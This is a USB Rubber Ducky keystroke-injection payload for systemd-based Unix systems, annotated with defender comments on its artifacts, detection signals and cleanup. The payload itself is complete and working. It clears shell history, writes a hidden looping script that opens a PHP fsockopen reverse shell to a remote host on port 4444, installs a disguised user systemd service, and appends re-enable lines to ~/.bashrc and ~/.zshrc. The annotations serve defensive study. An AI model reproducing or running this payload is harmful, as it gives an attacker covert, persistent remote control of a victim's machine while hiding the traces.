Path: blob/master/payloads/library/remote_access/persistentReverseDucky/payload.txt
REM Title: persistentReverseDucky
REM Description: persistentReverseDucky provides you persistent reverse shell remotely/locally by creating non-root systemd service.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Remote Access
REM Target: Unix-like operating systems with systemd
REM Attackmodes: HID
REM NOTE(defender): HID attack mode means the device presents itself as a keyboard and types
REM every STRING line below into the logged-in user's session. Nothing here needs root, so the
REM relevant controls are session locking and a policy on newly attached USB input devices
REM (for example a USBGuard allow-list), not privilege restrictions.
REM NOTE(defender): Artifacts written by this script, all visible in the lines below:
REM   /var/tmp/.system/systemBus                  (looping shell script)
REM   ~/.config/systemd/user/systemBUS.service    (user-level systemd unit)
REM   a "systemctl --user enable --now systemBUS.service" line appended to ~/.zshrc and ~/.bashrc
REM   ~/tmmmp                                     (helper script, deleted after it runs)

REM [keeping tracks clear]
REM NOTE(defender): CTRL-ALT t is sent as a keystroke; presumably it opens a terminal on desktops
REM that bind that shortcut. The typed command then unsets HISTFILE and sets HISTSIZE=0, so the
REM commands that follow should not be expected in the user's shell history. Investigation has to
REM rely on file timestamps, process/exec auditing and the systemd user journal instead.
DELAY 500
CTRL-ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100

REM [creating reverse shell]
REM NOTE(defender): Creates the dot-directory /var/tmp/.system and writes an executable script
REM named systemBus into it. The script is an endless loop that pings an address and, when the
REM ping succeeds, runs "php -r" with fsockopen() towards the same address on port 4444 and an
REM exec() of /bin/sh. The address 0.0.0.0 and port 4444 are the values as published on this page.
REM Detection signals: a hidden directory under /var/tmp holding an executable, recurring
REM "ping -c 5" runs from a user service, and a "php -r" process whose argument contains fsockopen.
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100

REM [creating non-root systemd service]
REM NOTE(defender): Writes a unit file into the per-user systemd directory, which the user can
REM create and enable without elevated rights. ExecStart runs the script above through /bin/bash,
REM Restart=on-failure asks systemd to restart it when it fails, and WantedBy=default.target ties
REM it to the user's default target. The Description "System BUS handler" and the file name
REM systemBUS.service appear chosen to resemble a system component. Hunting: enumerate
REM ~/.config/systemd/user/ for every account and compare "systemctl --user list-unit-files"
REM against a known baseline.
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 100
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100

REM [enabling service]
REM NOTE(defender): Reloads the user systemd manager, then enables and starts the unit. These
REM actions are recorded by the user's systemd instance, so "journalctl --user -u systemBUS.service"
REM is a place to look for the first start time.
STRING systemctl --user daemon-reload
ENTER
STRING systemctl --user enable --now systemBUS.service
ENTER
STRING systemctl --user start --now systemBUS.service
ENTER
DELAY 100

REM [autostarting service on terminal/shell launch]
REM NOTE(defender): Writes a helper script to ~/tmmmp that checks, via "ls -a | grep", for names
REM containing zshrc and bashrc in the directory it runs from, and appends
REM "systemctl --user enable --now systemBUS.service" to ~/.zshrc and ~/.bashrc when found. The last
REM STRING line runs the helper from ~, deletes it and exits the terminal. The effect is a second
REM persistence point: removing only the unit's enablement is not enough, because the next
REM interactive shell re-enables it. Cleanup therefore covers all of: the appended rc-file lines,
REM "systemctl --user disable --now systemBUS.service", the unit file, and /var/tmp/.system.
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
ENTER
DELAY 50
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
ENTER